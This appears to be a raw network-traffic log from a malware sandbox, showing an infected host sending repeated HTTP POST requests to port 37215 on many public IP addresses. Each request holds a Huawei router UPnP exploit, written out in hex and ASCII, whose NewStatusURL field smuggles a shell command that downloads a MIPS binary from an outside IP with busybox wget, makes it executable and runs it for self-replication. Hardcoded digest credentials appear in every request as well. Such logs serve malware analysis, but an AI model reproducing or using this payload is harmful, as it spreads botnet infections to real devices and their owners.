                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        636192.168.2.2358342157.101.75.22637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493444920 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        637192.168.2.2353754157.215.248.12537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493511915 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        638192.168.2.2359970197.216.224.6037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493514061 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        639192.168.2.2347844157.80.15.14137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493576050 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        640192.168.2.234394841.214.90.15337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493594885 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        641192.168.2.2334740157.68.239.9737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493612051 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        642192.168.2.234967441.217.145.22537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494417906 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        643192.168.2.2341444197.179.109.11037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494420052 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        644192.168.2.2346170157.204.100.25337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494420052 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        645192.168.2.234152641.82.47.4137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494426012 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
